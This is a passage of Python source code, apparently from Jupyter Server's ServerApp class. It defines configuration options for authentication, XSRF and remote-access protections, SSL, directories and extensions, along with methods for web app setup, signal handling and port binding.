OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""",
allow_none=True,
)
@default("min_open_files_limit")
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug(
"Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft
)
return soft
max_body_size = Integer(
512 * 1024 * 1024,
config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
""",
)
max_buffer_size = Integer(
512 * 1024 * 1024,
config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
""",
)
@observe("token")
def _token_changed(self, change):
self._token_generated = False
password = Unicode(
u"",
config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from jupyter_server.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
""",
)
password_required = Bool(
False,
config=True,
help="""Forces users to use a password for the Jupyter server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving on localhost is not secure since
any user can connect to the Jupyter server via ssh.
""",
)
allow_password_change = Bool(
True,
config=True,
help="""Allow password to be changed at login for the Jupyter server.
While logging in with a token, the Jupyter server UI will give the opportunity to
the user to enter a new password at the same time that will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
""",
)
disable_check_xsrf = Bool(
False,
config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
""",
)
allow_remote_access = Bool(
config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""",
)
@default("allow_remote_access")
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
try:
parsed = ipaddress.ip_address(addr.split("%")[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback or (("%" in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
use_redirect_file = Bool(
True,
config=True,
help="""Disable launching browser by redirect file
For versions of notebook > 5.7.2, a security feature measure was added that
prevented the authentication token used to launch the browser from being visible.
This feature makes it difficult for other users on a multi-user system from
running code in your Jupyter session as you.
However, some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
launching a browser using a redirect file can lead the browser failing to load.
This is because of the difference in file structures/paths between the runtime and
the browser.
Disabling this setting to False will disable this behavior, allowing the browser
to launch by using a URL and visible token (as before).
""",
)
local_hostnames = List(
Unicode(),
["localhost"],
config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
""",
)
open_browser = Bool(
False,
config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(ServerApp.browser) configuration option.
""",
)
browser = Unicode(
u"",
config=True,
help="""Specify what command to use to invoke a web
browser when starting the server. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""",
)
webbrowser_open_new = Integer(
2,
config=True,
help=_i18n(
"""Specify where to open the server on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""
),
)
tornado_settings = Dict(
config=True,
help=_i18n(
"Supply overrides for the tornado.web.Application that the " "Jupyter server uses."
),
)
websocket_compression_options = Any(
None,
config=True,
help=_i18n(
"""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
"""
),
)
terminado_settings = Dict(
config=True,
help=_i18n('Supply overrides for terminado. Currently only supports "shell_command".'),
)
cookie_options = Dict(
config=True,
help=_i18n(
"Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details."
),
)
get_secure_cookie_kwargs = Dict(
config=True,
help=_i18n(
"Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details."
),
)
ssl_options = Dict(
allow_none=True,
config=True,
help=_i18n(
"""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""
),
)
jinja_environment_options = Dict(
config=True, help=_i18n("Supply extra arguments that will be passed to Jinja environment.")
)
jinja_template_vars = Dict(
config=True,
help=_i18n("Extra variables to supply to jinja templates when rendering."),
)
base_url = Unicode(
"/",
config=True,
help="""The base URL for the Jupyter server.
Leading and trailing slashes can be omitted,
and will automatically be added.
""",
)
@validate("base_url")
def _update_base_url(self, proposal):
value = proposal["value"]
if not value.startswith("/"):
value = "/" + value
if not value.endswith("/"):
value = value + "/"
return value
extra_static_paths = List(
Unicode(),
config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the Jupyter server machine,
or overriding individual files in the IPython""",
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(), help=_i18n("""Path to search for custom.js, css"""))
@default("static_custom_path")
def _default_static_custom_path(self):
return [os.path.join(d, "custom") for d in (self.config_dir, DEFAULT_STATIC_FILES_PATH)]
extra_template_paths = List(
Unicode(),
config=True,
help=_i18n(
"""Extra paths to search for serving jinja templates.
Can be used to override templates from jupyter_server.templates."""
),
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_services = List(
Unicode(),
config=True,
help=_i18n(
"""handlers that should be loaded at higher priority than the default services"""
),
)
websocket_url = Unicode(
"",
config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
""",
)
quit_button = Bool(
True,
config=True,
help="""If True, display controls to shut down the Jupyter server, such as menu items or buttons.""",
)
# REMOVE in VERSION 2.0
# Temporarily allow content managers to inherit from the 'notebook'
# package. We will deprecate this in the next major release.
contents_manager_class = TypeFromClasses(
default_value=LargeFileManager,
klasses=[
"jupyter_server.services.contents.manager.ContentsManager",
"notebook.services.contents.manager.ContentsManager",
],
config=True,
help=_i18n("The content manager class to use."),
)
# Throws a deprecation warning to notebook based contents managers.
@observe("contents_manager_class")
def _observe_contents_manager_class(self, change):
new = change["new"]
# If 'new' is a class, get a string representing the import
# module path.
if inspect.isclass(new):
new = new.__module__
if new.startswith("notebook"):
self.log.warning(
"The specified 'contents_manager_class' class inherits a manager from the "
"'notebook' package. This is not guaranteed to work in future "
"releases of Jupyter Server. Instead, consider switching the "
"manager to inherit from the 'jupyter_server' managers. "
"Jupyter Server will temporarily allow 'notebook' managers "
"until its next major release (2.x)."
)
kernel_manager_class = Type(
default_value=AsyncMappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_i18n("The kernel manager class to use."),
)
session_manager_class = Type(
default_value=SessionManager, config=True, help=_i18n("The session manager class to use.")
)
config_manager_class = Type(
default_value=ConfigManager, config=True, help=_i18n("The config manager class to use")
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
""",
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_i18n("The login handler class to use."),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_i18n("The logout handler class to use."),
)
trust_xheaders = Bool(
False,
config=True,
help=(
_i18n(
"Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"
)
),
)
info_file = Unicode()
@default("info_file")
def _default_info_file(self):
info_file = "jpserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default("browser_open_file")
def _default_browser_open_file(self):
basename = "jpserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
browser_open_file_to_run = Unicode()
@default("browser_open_file_to_run")
def _default_browser_open_file_to_run(self):
basename = "jpserver-file-to-run-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode(
"disabled",
config=True,
help=_i18n(
"""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
"""
),
)
@observe("pylab")
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change["new"] != "warn":
backend = " %s" % change["new"]
else:
backend = ""
self.log.error(
_i18n("Support for specifying --pylab on the command line has been removed.")
)
self.log.error(
_i18n("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(
backend
)
)
self.exit(1)
notebook_dir = Unicode(config=True, help=_i18n("DEPRECATED, use root_dir."))
@observe("notebook_dir")
def _update_notebook_dir(self, change):
if self._root_dir_set:
# only use deprecated config if new config is not set
return
self.log.warning(_i18n("notebook_dir is deprecated, use root_dir"))
self.root_dir = change["new"]
root_dir = Unicode(config=True, help=_i18n("The directory to use for notebooks and kernels."))
_root_dir_set = False
@default("root_dir")
def _default_root_dir(self):
if self.file_to_run:
self._root_dir_set = True
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return os.getcwd()
def _normalize_dir(self, value):
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
return value
@validate("root_dir")
def _root_dir_validate(self, proposal):
value = self._normalize_dir(proposal["value"])
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such directory: '%r'") % value)
return value
preferred_dir = Unicode(
config=True,
help=trans.gettext("Preferred starting directory to use for notebooks and kernels."),
)
@default("preferred_dir")
def _default_prefered_dir(self):
return self.root_dir
@validate("preferred_dir")
def _preferred_dir_validate(self, proposal):
value = self._normalize_dir(proposal["value"])
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such preferred dir: '%r'") % value)
# preferred_dir must be equal or a subdir of root_dir
if not value.startswith(self.root_dir):
raise TraitError(
trans.gettext("preferred_dir must be equal or a subdir of root_dir: '%r'") % value
)
return value
@observe("root_dir")
def _root_dir_changed(self, change):
self._root_dir_set = True
if not self.preferred_dir.startswith(change["new"]):
self.log.warning(
trans.gettext("Value of preferred_dir updated to use value of root_dir")
)
self.preferred_dir = change["new"]
@observe("server_extensions")
def _update_server_extensions(self, change):
self.log.warning(_i18n("server_extensions is deprecated, use jpserver_extensions"))
self.server_extensions = change["new"]
jpserver_extensions = Dict(
default_value={},
value_trait=Bool(),
config=True,
help=(
_i18n(
"Dict of Python modules to load as Jupyter server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order."
)
),
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_i18n("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(
1000,
config=True,
help=_i18n(
"""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""
),
)
iopub_data_rate_limit = Float(
1000000,
config=True,
help=_i18n(
"""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""
),
)
rate_limit_window = Float(
3,
config=True,
help=_i18n(
"""(sec) Time window used to
check the message and data rate limits."""
),
)
shutdown_no_activity_timeout = Integer(
0,
config=True,
help=(
"Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the Jupyter server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown."
),
)
terminals_enabled = Bool(
True,
config=True,
help=_i18n(
"""Set to False to disable terminals.
This does *not* make the server more secure by itself.
Anything the user can in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""
),
)
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
""",
config=True,
)
_starter_app = Instance(
default_value=None,
allow_none=True,
klass="jupyter_server.extension.application.ExtensionApp",
)
@property
def starter_app(self):
"""Get the Extension that started this server."""
return self._starter_app
def parse_command_line(self, argv=None):
super(ServerApp, self).parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_i18n("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.ServerApp.root_dir = f
elif os.path.isfile(f):
c.ServerApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = (
"jupyter_server.gateway.managers.GatewayMappingKernelManager"
)
self.session_manager_class = "jupyter_server.gateway.managers.GatewaySessionManager"
self.kernel_spec_manager_class = (
"jupyter_server.gateway.managers.GatewayKernelSpecManager"
)
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (ServerApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger("tornado")
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp"""
self.tornado_settings["allow_origin"] = self.allow_origin
self.tornado_settings["websocket_compression_options"] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings["allow_origin_pat"] = re.compile(self.allow_origin_pat)
self.tornado_settings["allow_credentials"] = self.allow_credentials
self.tornado_settings["autoreload"] = self.autoreload
self.tornado_settings["cookie_options"] = self.cookie_options
self.tornado_settings["get_secure_cookie_kwargs"] = self.get_secure_cookie_kwargs
self.tornado_settings["token"] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(
_i18n("Jupyter servers are configured to only be run with a password.")
)
self.log.critical(_i18n("Hint: run the following command to set a password"))
self.log.critical(_i18n("\t$ python -m jupyter_server.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_JUPYTER_SERVER_PORT:
self.log.critical(
("Options --port and --sock are mutually exclusive. Aborting."),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
("Ignoring --ServerApp.open_browser due to --sock being used."),
)
if self.file_to_run:
self.log.critical(
("Options --ServerApp.file_to_run and --sock are mutually exclusive."),
)
sys.exit(1)
if sys.platform.startswith("win"):
self.log.critical(
(
"Option --sock is not supported on Windows, but got value of %s. Aborting."
% self.sock
),
)
sys.exit(1)
self.web_app = ServerWebApplication(
self,
self.default_services,
self.kernel_manager,
self.contents_manager,
self.session_manager,
self.kernel_spec_manager,
self.config_manager,
self.extra_services,
self.log,
self.base_url,
self.default_url,
self.tornado_settings,
self.jinja_environment_options,
)
if self.certfile:
self.ssl_options["certfile"] = self.certfile
if self.keyfile:
self.ssl_options["keyfile"] = self.keyfile
if self.client_ca:
self.ssl_options["ca_certs"] = self.client_ca
if not self.ssl_options:
# could be an empty dict or None
# None indicates no SSL config
self.ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
self.ssl_options.setdefault(
"ssl_version", getattr(ssl, "PROTOCOL_TLS", ssl.PROTOCOL_SSLv23)
)
if self.ssl_options.get("ca_certs", False):
self.ssl_options.setdefault("cert_reqs", ssl.CERT_REQUIRED)
ssl_options = self.ssl_options
self.login_handler_class.validate_security(self, ssl_options=self.ssl_options)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug(
"Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)"
)
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
"Raising open file limit: soft {}->{}; hard {}->{}".format(
old_soft, soft, old_hard, hard
)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def _get_urlparts(self, path=None, include_token=False):
"""Constructs a urllib named tuple, ParseResult,
with default values set by server config.
The returned tuple can be manipulated using the `_replace` method.
"""
if self.sock:
scheme = "http+unix"
netloc = urlencode_unix_socket_path(self.sock)
else:
# Handle nonexplicit hostname.
if self.ip in ("", "0.0.0.0"):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
netloc = "{ip}:{port}".format(ip=ip, port=self.port)
if self.certfile:
scheme = "https"
else:
scheme = "http"
if not path:
path = self.default_url
query = None
if include_token:
if self.token: # Don't log full token if it came from config
token = self.token if self._token_generated else "..."
query = urllib.parse.urlencode({"token": token})
# Build the URL Parts to dump.
urlparts = urllib.parse.ParseResult(
scheme=scheme, netloc=netloc, path=path, params=None, query=query, fragment=None
)
return urlparts
@property
def public_url(self):
parts = self._get_urlparts(include_token=True)
# Update with custom pieces.
if self.custom_display_url:
# Parse custom display_url
custom = urllib.parse.urlparse(self.custom_display_url)._asdict()
# Get pieces that are matter (non None)
custom_updates = {key: item for key, item in custom.items() if item}
# Update public URL parts with custom pieces.
parts = parts._replace(**custom_updates)
return parts.geturl()
@property
def local_url(self):
parts = self._get_urlparts(include_token=True)
# Update with custom pieces.
if not self.sock:
parts = parts._replace(netloc="127.0.0.1:{port}".format(port=self.port))
return parts.geturl()
@property
def display_url(self):
"""Human readable string with URLs for interacting
with the running Jupyter Server
"""
url = self.public_url + "\n or " + self.local_url
return url
@property
def connection_url(self):
urlparts = self._get_urlparts(path=self.base_url)
return urlparts.geturl()
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from jupyter_server.terminal import initialize
initialize(self.web_app, self.root_dir, self.connection_url, self.terminado_settings)
self.terminals_available = True
except ImportError as e:
self.log.warning(_i18n("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith("win") and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, "SIGUSR1"):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, "SIGINFO"):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_i18n("interrupted"))
# Check if answer_yes is set
if self.answer_yes:
self.log.critical(_i18n("Shutting down..."))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.stop(from_signal=True)
return
print(self.running_server_info())
yes = _i18n("y")
no = _i18n("n")
sys.stdout.write(_i18n("Shutdown this Jupyter server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r, w, x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_i18n("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.stop(from_signal=True)
return
else:
print(_i18n("No answer for 5s:"), end=" ")
print(_i18n("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_i18n("received signal %s, stopping"), sig)
self.stop(from_signal=True)
def _signal_info(self, sig, frame):
print(self.running_server_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def find_server_extensions(self):
"""
Searches Jupyter paths for jpserver_extensions.
"""
# Walk through all config files looking for jpserver_extensions.
#
# Each extension will likely have a JSON config file enabling itself in
# the "jupyter_server_config.d" directory. Find each of these and
# merge there results in order of precedence.
#
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level clobbers the previous.
config_paths = jupyter_config_path()
if self.config_dir not in config_paths:
# add self.config_dir to the front, if set manually
config_paths.insert(0, self.config_dir)
manager = ExtensionConfigManager(read_config_path=config_paths)
extensions = manager.get_jpserver_extensions()
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.jpserver_extensions:
self.config.ServerApp.jpserver_extensions.update({modulename: enabled})
self.jpserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
"""
If an extension's metadata includes an 'app' key,
the value must be a subclass of ExtensionApp. An instance
of the class will be created at this step. The config for
this instance will inherit the ServerApp's config object
and load its own config.
"""
# Create an instance of the ExtensionManager.
self.extension_manager = ExtensionManager(log=self.log, serverapp=self)
self.extension_manager.from_jpserver_extensions(self.jpserver_extensions)
self.extension_manager.link_all_extensions()
def load_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
self.extension_manager.load_all_extensions()
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
# and explicitly tell the mimetypes to not trust the Windows registry
if os.name == "nt":
# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type("text/css", ".css")
mimetypes.add_type("application/javascript", ".js")
# for python <3.8
mimetypes.add_type("application/wasm", ".wasm")
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings["terminal_manager"]
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = (utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.", seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info(
"No kernels or terminals for %d seconds; shutting down.", seconds_since_active
)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info(
"Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout,
)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
@property
def http_server(self):
"""An instance of Tornado's HTTPServer class for the Server Web Application."""
try:
return self._http_server
except AttributeError as e:
raise AttributeError(
"An HTTPServer instance has not been created for the "
"Server Web Application. To create an HTTPServer for this "
"application, call `.init_httpserver()`."
) from e
def init_httpserver(self):
"""Creates an instance of a Tornado HTTPServer for the Server Web Application
and sets the http_server attribute.
"""
# Check that a web_app has been initialized before starting a server.
if not hasattr(self, "web_app"):
raise AttributeError(
"A tornado web application has not be initialized. "
"Try calling `.init_webapp()` first."
)
# Create an instance of the server.
self._http_server = httpserver.HTTPServer(
self.web_app,
ssl_options=self.ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size,
)
success = self._bind_http_server()
if not success:
self.log.critical(
_i18n(
"ERROR: the Jupyter server could not be started because "
"no available port could be found."
)
)
self.exit(1)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_i18n("The socket %s is already in use.") % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_i18n("The socket %s is already in use.") % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, "WSAEACCES", errno.EACCES)):
self.log.warning(_i18n("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries + 1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(
_i18n("The port %i is already in use, trying another port.") % port
)
else:
self.log.info(_i18n("The port %i is already in use.") % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, "WSAEACCES", errno.EACCES)):
self.log.warning(_i18n("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(
_i18n(
"ERROR: the Jupyter server could not be started because "
"no available port could be found."
)
)
else:
self.log.critical(
_i18n(
"ERROR: the Jupyter server could not be started because "
"port %i is not available."
)
% port
)
self.exit(1)
return success
@staticmethod
def _init_asyncio_patch():
"""set default asyncio policy to be compatible with tornado
Tornado 6.0 is not compatible with default asyncio
ProactorEventLoop, which lacks basic *_reader methods.
Tornado 6.1 adds a workaround to add these methods in a thread,
but SelectorEventLoop should still be preferred
to avoid the extra thread for ~all of our events,
at least until asyncio adds *_reader methods
to proactor.
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# prefer Selector to Proactor for tornado + pyzmq
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(
self, argv=None, find_extensions=True, new_httpserver=True, starter_extension=None
):
"""Initialize the Server application class, configurables, web application, and http server.
Parameters
----------
argv : list or None
CLI arguments to parse.
find_extensions : bool
If True, find and load extensions listed in Jupyter config paths. If False,
only load extensions that are passed to ServerApp directy through
the `argv`, `config`, or `jpserver_extensions` arguments.
new_httpserver : bool
If True, a tornado HTTPServer instance will be created and configured for the Server Web
Application. This will set the http_server attribute of this class.
starter_extension : str
If given, it references the name of an extension point that started the Server.
We will try to load configuration from extension point
"""
self._init_asyncio_patch()
# Parse command line, load ServerApp config files,
# and update ServerApp config.
super(ServerApp, self).initialize(argv=argv)
if self._dispatching:
return
# Then, use extensions' config loading mechanism to
# update config. ServerApp config takes precedence.
if find_extensions:
self.find_server_extensions()
self.init_logging()
self.init_server_extensions()
# Special case the starter extension and load
# any server configuration is provides.
if starter_extension:
# Configure ServerApp based on named extension.
point = self.extension_manager.extension_points[starter_extension]
# Set starter_app property.
if point.app:
self._starter_app = point.app
# Load any configuration that comes from the Extension point.
self.update_config(Config(point.config))
# Initialize other pieces of the server.
self.init_resources()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_ioloop()
self.load_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
if new_httpserver:
self.init_httpserver()
async def cleanup_kernels(self):
"""Shutdown all kernels.
